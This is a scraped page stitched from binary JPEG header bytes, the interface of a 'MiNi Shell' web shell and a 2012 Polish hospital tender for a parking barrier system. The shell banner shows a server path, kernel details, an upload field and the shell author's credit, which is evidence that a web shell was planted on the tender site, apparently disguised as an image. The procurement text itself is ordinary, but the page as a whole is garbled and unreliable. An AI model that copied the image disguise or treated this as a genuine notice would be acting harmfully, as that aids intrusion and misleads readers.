JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121018/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121018/406052-N-2012.html

<p class="kh_header"><b>Siemianowice Śląskie: Wykonanie systemu parkingowego Szpitala opartego na kartach abonamentowych oraz biletach dla klientów</b><br>
<b>Numer ogłoszenia: 406052 - 2012; data zamieszczenia: 18.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Siemianowicach Śląskich , ul. 1-go Maja 9, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 032 2281930, faks 032 2281498.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsiemianowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie systemu parkingowego Szpitala opartego na kartach abonamentowych oraz biletach dla klientów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Przedmiot zamówienia:
System parkingowy Szpitala oparty na kartach abonamentowych oraz biletach na klientów.
II.	Miejsce wykonania montażu:
Zespół budynków Szpitala Miejskiego zlokalizowany w Siemianowicach Śląskich przy ul. 1 go Maja 9
III.	Zakres zamówienia:
1.	Wykonanie projektu systemu parkingowego wraz z rysunkami wymaganymi przepisami prawa
2.	Wykonanie budki dla parkingowego
3.	Dostawa oraz montaż bramy przesuwnej o długości 4 mb (przy stanowisku WYJAZD),
4.	Dostawa i montaż 2 szlabanów (wjazd i wyjazd),
5.	Dostawa sprzętu i oprogramowania niezbędnego do wykonania i funkcjonowania systemu parkingu,
6.	Dostawa 100 szt kart magnetycznych abonamentowych, oraz 3 pilotów bezprzewodowych, z możliwością domówienia kolejnych
7.	Dostawa i montaż kamery, monitora z komputerem umożliwiających podgląd wjazdu z budki parkingowego,
8.	Dostawa i montaż barierek chroniących szlabany, budkę i czytniki przed najazdem przez pojazd
9.	Wykonanie i uruchomienie systemu parkingowego płatnego na terenie Szpitala. 
10.	Wykonanie dokumentacji po wykonawczej. 
11.	Szkolenie z zakresu prawidłowej eksploatacji wykonanego przedmiotu Zamówienia.
12.	Zapewnienie serwisu eksploatacyjnego i gwarancyjnego 
IV.	Wymagania dla przedmiotu zamówienia:
1.	Możliwość podnoszenia szlabanu za pomocą dedykowanych kart zbliżeniowych (abonamentowych) przy użyciu czytników kart lub bileterki zamontowanych przy szlabanie wjazdowym.
2.	Możliwość podnoszenia szlabanu za pomocą pilotów bezprzewodowych (3 sztuki) jako tryb awaryjny.
3.	Szlabany pełniące funkcje WJAZD i WYJAZD o długości 4m wyposażone fotokomórką zabezpieczającą przed opuszczeniem szlabanu w momencie przebywania pod nim pojazdu, układ pętli indukcyjnej zamykający szlaban po przejeździe pojazdu. Stanowiska Wjazd
i Wyjazd wyposażone w sygnalizację świetlną (Czerwone-zamknięte, Zielone - Wolne),
4.	Połączenie się poprzez system domofonu stanowiska WJAZD ze stanowiskiem obsługi na WYJAZD. Domofon musi być zamontowany wraz z czytnikiem kart .i automatem wydającym bilety.
5.	Kiosk dla obsługi, wyposażony w oświetlenie, ogrzewanie oraz gniazda elektryczne i sieciowe oraz możliwość podłączenia linii telefonicznej. Okna zabezpieczone roletami zewnętrznymi a kiosk w system alarmowy z sygnalizacją akustyczną i powiadomieniem telefonicznym załączenia alarmu.
6.	Możliwość podglądu szlabanu wjazdowego ze stanowiska dozorowego (kamera na WJEŹDZIE, monitor na stanowisku obsługi na WYJEŹDZIE).
7.	Kiosk obsługi wyposażony w komputer z oprogramowaniem umożliwiającym rozliczenie biletów przy wyjeździe, wydruk raportów kasowych, wydruk stanu parkingu, współprace z czytnikami dalekiego zasięgu kart zbliżeniowych, wyposażony w czytnik kodów, współpracę ze szlabanami, oraz sterowanie nimi.
8.	Możliwość podnoszenia szlabanów zdalnie ze stanowiska dozorowego. 
9.	Rejestracja informacji o podniesieniach szlabanów. Oprogramowanie musi umożliwiać rejestrowania informacji o: 
a)	sposobie podniesienia szlabanów (ręcznie czy poprzez kartę zbliżeniową lub bilet), 
b)	dacie i godzinie podniesienia szlabanów, 
c)	karcie przy pomocy której wykonana została czynność podniesienia szlabanów 
V.	Dokumentacja
Dokumentacje: projektową i wykonawczą oraz instrukcje obsługi systemu powinny być dostarczone w 2 egzemplarze. Dodatkowo oprócz wersji papierowej należy dostarczyć ją w wersji elektronicznej (PDF).
VI.	Zakres dostawy:
Wykonawca zobowiązany jest dostarczyć następujący sprzęt niezbędny do wykonania przedmiotu zamówienia:
1.	szlaban do pracy intensywnej o długości ramienia 4 m z oświetleniem ostrzegawczym oraz kompletem nalepek odblaskowym - 2 szt.
2.	sygnalizacja świetlna ostrzegawcza - 2 szt
3.	kamera zewnętrzna - 1 szt.
4.	kolumna fotokomórki - 2 szt.
5.	pętla indukcyjna - 2 szt.
6.	terminal biletowy wraz z domofonem - 1 szt.
7.	karty magnetyczne (abonamentowe) - 100 szt
8.	piloty bezprzewodowe zdalnego otwierania szlabanów - 3 szt  
9.	czytnik kart abonamentowych - 2 szt.
10.	budka dla parkingowego - 1 szt.
11.	brama przesuwna szerokość 4 m - 1 szt.
12.	skaner ręczny do rozliczania biletów - 1 szt
13.	komputer wraz z oprogramowaniem - 1 szt.
14.	drukarka fiskalna - 1 szt.

Wykonawca zobowiązany jest dostarczyć również wszelkie niezbędne materiały i urządzenia wynikające z przedstawionego Zamawiającemu projektu i zatwierdzonego systemu parkingowego niezbędne do uruchomienia i prawidłowego działania systemu. W zakres dostawy wchodzi również oprogramowanie niezbędne do prawidłowego funkcjonowania systemu. Wykonawca musi przekazać wszelkie kody serwisowe i hasła niezbędne do dostępu obsługi systemu i oprogramowania.
VII.	Zakres robót:
Zakresem robót objęte są wszystkie czynności umożliwiające i mające na celu wykonanie systemu parkingowego, w szczególności:
1.	montaż budki parkingowej,
2.	montaż kamery na wjeździe,
3.	montaż szlabanów w miejscach uzgodnionych z Zamawiającym, 
4.	ułożenie okablowania zasilającego i sterującego do obsługi szlabanów, kamery i domofonu, 
5.	montaż wszystkich elementów systemu zgodnie z zakresem dostawy oraz wpięcie ich w jeden system z komputerem na którym będzie zainstalowane dedykowane oprogramowanie kontroli dostępu, 
6.	konfiguracja systemu.

Zaleca się aby Wykonawca dokonał wizji lokalnej na terenie, gdzie mają być wykonane roboty oraz  uzyskał na swoją odpowiedzialność i ryzyko wszelkie istotne informacje, które mogą być niezbędne do przygotowania oferty. Wizja odbędzie się w uzgodnieniu z Kierownikiem Działu Technicznego  Szpitala, nr tel. 32 228-30-30 wew.336 od poniedziałku do piątku w godz. 7:00÷14:30

Wymagania co do zakresu prac montażowych do wykonania:
1.	Wykonawca jest odpowiedzialny za jakość wykonywanych przez siebie prac oraz ich zgodność ze specyfikacją techniczną i poleceniami Zamawiającego.
2.	Wykonawca zobowiązany jest do wykonania wszelkich prac odtworzeniowych po wykonanym montażu instalacji.
3.	Punkt obsługi parkingu będzie znajdował się w budce dostarczonej przez Wykonawcę.
4.	Zasilacze buforowe oraz urządzenia do konwersji sygnału zostaną zamontowane w miejscach uzgodnionych z Zamawiającym.
5.	Okablowanie dla systemów szlabanów musi być poprowadzone przy pomocy odpowiednich kabli doziemnych.
Wykonawca zobowiązany jest dostarczyć instrukcję obsługi systemu dla użytkownika i odrębną dla administratora.
Na podstawie otrzymanego od Wykonawcy zgłoszenia Zamawiający dokona odbiorów wykonanych prac. Celem odbioru będzie finalna ocena wykonanych robót pod względem jakości i zgodności z zamówieniem. W trakcie odbioru sprawdzeniu podlegać będzie:
1.	zgodność realizacji z przedmiotem zamówienia i dokonanymi ustaleniami prawidłowość działania wszystkich urządzeń, 
2.	prawidłowość wykonania połączeń 
3.	prawidłowość działania całego systemu 
4.	dokumentacja powykonawcza 
5.	instrukcje obsługi systemu 
VIII.	Gwarancja
Wykonawca zobowiązany jest do udzielenia co najmniej 36 miesięcy gwarancji na system parkingowy oraz zapewnienie w okresie gwarancji bezpłatnego serwisu gwarancyjnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.15.10.00-1, 30.14.42.00-2, 31.68.22.10-5, 34.99.63.00-8, 80.53.12.00-7, 45.22.33.00-9, 45.21.33.12-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie uznany za spełniony jeżeli Wykonawcy złożą stosowne oświadczenie zgodnie z formularzem stanowiącym załącznik nr 4 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie uznany za spełniony jeżeli Wykonawcy wykażą iż w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali lub wykonują co najmniej dwa zamówienia odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia tj. wykonywali system parkingowy oparty na kartach abonamentowych oraz biletach dla klientów, o wartości równej co najmniej kwocie 30 000,00 zł brutto na każde z zamówień,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie uznany za spełniony jeżeli Wykonawca przedstawi dokumenty potwierdzające spełnienie warunków technicznych zawartych w załączniku nr 1 do SIWZ tj. certyfikaty, zestawień cech i parametrów charakterystycznych dla przedmiotu zamówienia, katalogów, ulotek lub innych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie uznany za spełniony jeżeli Wykonawcy przedstawią polisę, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50 000,00 zł, wraz z dowodem opłacenia polisy. Termin ważności polisy musi obejmować okres realizacji zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">-zaakceptowane warunki projektu umowy stanowiącego załącznik nr 3 do SIWZ zaparafowane przez osoby uprawnione do reprezentowania Wykonawcy,
-opis oferowanego przedmiotu zamówienia zawierający szczegółowe dane zaproponowanego przedmiotu zamówienia w celu wykonania kompletnego systemu parkingowego wraz z wszystkimi urządzeniami składającymi się na przedmiot zamówienia w celu potwierdzenia spełnienia przez zaoferowany przedmiot zamówienia wymagań ustalonych przez Zamawiającego, np. certyfikaty, zestawienie cech i parametrów charakterystycznych dla przedmiotu zamówienia, katalogi, ulotki lub inne dokumenty. Dokumenty muszą potwierdzać spełnianie warunków technicznych zawartych w załączniku nr 1 do SIWZ. Szczegółowe wymagania dotyczące przedmiotu zamówienia określone zostały przez Zamawiającego w załączniku nr 1,
-Zamawiający wymaga złożenia oświadczenia o posiadaniu deklaracji zgodności CE dla dostarczonego sprzętu,</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany umowy wymagają zachowania formy pisemnej, pod rygorem nieważności. 
2.	Na podstawie regulacji art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Dostawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego, a także dotyczą: 
a)	obniżenia cen w stosunku do cen ofertowych przez Wykonawcę, 
b)	zmiany danych Stron umowy (np. zmiana siedziby, adresu, nazwy),
c)	działania siły wyższej lub wystąpienia stanu wyższej konieczności,
d)	zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe, zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
e)	omyłek pisarskich lub błędów rachunkowych,
f)	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
g)	zmiany sposobu płatności jeżeli wymagać będzie tego ochrona interesu Zamawiającego,
h)	zmiany za zgodą Zamawiającego zaproponowanych urządzeń lub elementów systemu jeżeli w celu zapewnienia optymalnego funkcjonowania systemu parkingowego zasadne stanie się dokonanie takich zmian, zmiana taka nie może powodować wzrostu wartości zamówienia,
i)	zmianę jakości, parametrów lub innych cech charakterystycznych dla przedmiotu zamówienia, w tym zmianę numeru katalogowego produktu bądź nazwy własnej produktu, nie powodującej jego pogorszenia,
j)	zmianę elementów składowych przedmiotu zamówienia na zasadzie ich uzupełnienia lub wymiany bez zmiany wynagrodzenia.
3.	Warunkami dokonania zmian wskazanych w pkt. 2 mogą być: 
a)	wprowadzony zostanie na rynek przez Wykonawcę przedmiot umowy zmodyfikowany bądź udoskonalony, 
b)	wystąpi przejściowy brak przedmiotu umowy z uwagi na zaprzestanie jego produkcji przez producenta przy jednoczesnej możliwości dostarczenia przedmiotu umowy zamiennego o parametrach nie gorszych od produktu będącego przedmiotem umowy, 
c)	będzie to konieczne ze względu na zapewnienie bezpieczeństwa lub zapobieżenie awarii, albo będzie to konieczne ze względu na zmianę powszechnie obowiązujących przepisów prawa,
d)	zmiana w inny sposób dostarczy pożytku Zamawiającemu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsiemianowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Siemianowicach Śląskich
ul. 1-go Maja9
41-100 Siemianowice Śląskie
Dział Zamówień Publicznych i Zaopatrzenia pokój -116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2012 godzina 09:30, miejsce: Szpital Miejski w Siemianowicach Śląskich
ul. 1-go Maja9
41-100 Siemianowice Śląskie
Dział Zamówień Publicznych i Zaopatrzenia pokój -116.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com